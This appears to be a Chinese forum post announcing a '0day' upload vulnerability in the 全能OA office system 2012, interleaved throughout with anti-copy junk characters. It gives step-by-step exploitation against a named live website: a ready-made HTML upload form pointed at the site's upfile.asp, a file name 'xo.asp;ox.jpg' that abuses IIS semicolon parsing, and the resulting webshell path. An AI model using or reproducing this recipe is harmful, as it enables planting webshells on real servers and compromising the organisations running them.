全能OA办公系统0day OA办公系统漏洞 上传漏洞

admin

全能OA办公系统 上传漏洞
​
系统介绍：

全能OA办公系统2012是功能非常强大的OA系统，目前功能已完全能满足日常办公需要。
7 z' o' K, A( t) P" L
主要功能：
公司通告
工作计划
通讯助理
客户资源
0 v7 N" b5 l! Z+ M我的公文
" ?  B# w# G( n公文传阅
公共资源
  j8 e6 J. H! V资源预约
% X! N4 ]( x" A0 N' e今日考勤
个人计划
个人通讯录
个人基本档案
  N. `1 ]3 i3 }3 F: i1 Q: c未读邮件
% s! j- J  _6 {0 p# a: w发邮件
收件夹
: U* p( y5 X- i; z' O5 S  G8 ^寄件夹
; f% P- _7 }- N3 F网络硬盘
: Z( B! l7 K) q  y) V6 g网络会议
网络调查
. c+ T, b9 {4 q; `' M交流论坛
" ^. ~" ]2 e) v$ O  |
有兴趣测试的朋友可以下源码看看
1 ?. p% E0 ]' M/ S
源码下载：
- L, y. X9 I6 ^1 r( }$ M
' Q6 _5 r: e6 X9 ]8 Ahttp://www.mycodes.net/30/4750.htm
0 z) V  T1 V; I
# w2 `* D: x/ I- O漏洞介绍：
, L- i" c9 B1 D" O+ v7 P
由upfile.asp上传文件漏洞引起

8 C( W/ R. h9 q% A) Z测试方法：
5 Q0 v* k- J" u' m9 f
6 v8 ~* f: ^' s7 A# [) p1 h使用名小子上传http://www.itlynn.com/upfile.asp即可
  X1 n7 `1 m5 g2 M! \
如果upfile.asp文件被删除不存在。
! a1 F1 k$ @  S- D, H
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。

: F# k' C& f, C- b9 ]& \3 {如果存在那么将如下代码保存为upfile.html。

: ?9 P" g# {. Y& e" x( ~9 @然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。



01 <table border='0' align="center" cellpadding="5">
' [- X6 \' V+ ^# s
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
! O* {- U  ]0 h# r
03 <tr>
. q' l" R2 S3 G) s! O# q8 i5 N9 ~
04             <td>报错：</td>
; m1 I+ h) |% l  m
  e, t* |" K9 U% r  H/ A7 s05             <td><input type='radio' name='errnumber' value='0'>
4 p% |/ J% u: Z) b. y
6 m+ t) k1 I4 q4 l06               自动更名

07               <input type='radio' name='errnumber' value='1' checked>
* ]! a3 ]% U# ~9 v" r% d
; \' G3 G% E- ?' [- t08               报错方式
9 _6 u! {- ]1 w" C. E) R
6 v1 r. a& g0 f- u09               <input type='radio' name='errnumber' value='2'>
1 k6 N& B9 s2 X+ W& x% T$ l5 k* ]
10               直接覆盖</td>

* Q5 C0 E, p% _1 r: C! W& V+ _11           </tr>
  F* u! o6 _0 _) n# K+ A7 p
12           <tr>

13             <td>主题：</td>
0 ?3 l' Q4 M, }  q3 F" e7 }
. g7 l4 O# W6 I# I8 @14             <td><input type='text' name='filename' size='30'></td>
6 G/ M0 K# x6 `- k7 v( h2 ]
1 X/ G. V9 Z7 v' L' b15           </tr>

, [* Q7 i1 Z8 u7 P; ]& U) T16           <tr>
( p& s& X% D) P) V% m
( z0 x, |4 [# d' K% j( Q17             <td>文件：</td>
' `/ G9 i4 i) [1 G
18             <td><input type="file"name="fruit"size="30"></td>
* ^" }8 Q7 ~/ F' V
6 t# }% X# y3 a19           </tr>
7 D  Q- @6 Y8 O+ o  |% `$ C# a
20           <tr>

21             <td valign='top'>简介：</td>
8 h$ J1 X" i& X+ G3 o
6 B: ?2 t+ U8 a4 R: z& e22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
( P  U! G' u+ d) G& B
, i; g4 l7 N/ l0 f; J23           </tr>
+ [) U4 j) `3 p# \/ H  z1 G
. u  e8 _- {  W+ c9 u, `; a% M( W24   
8 [4 E$ ^& w% S2 i8 h
# \# E# x4 u' z/ a) H25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
. M2 K! W2 j. p/ u0 V  ?
26           </tr>
$ g7 O4 X7 v! B4 k1 h+ x
2 w) u) ~7 P1 E% w27         </form>
' B2 B. S9 B0 f: j: G* [5 W
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
, ~$ t( D5 Q% J6 ]. V


0 ]) U% J. p/ ~上传成功后，马的路径是：http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
. U5 @! ?8 X& ^: @
& j9 n5 V2 A! i1 d  A此漏洞需要配合解析漏洞利用。

1 i, u. C3 h8 C2 p3 ]( x; h- W0 Y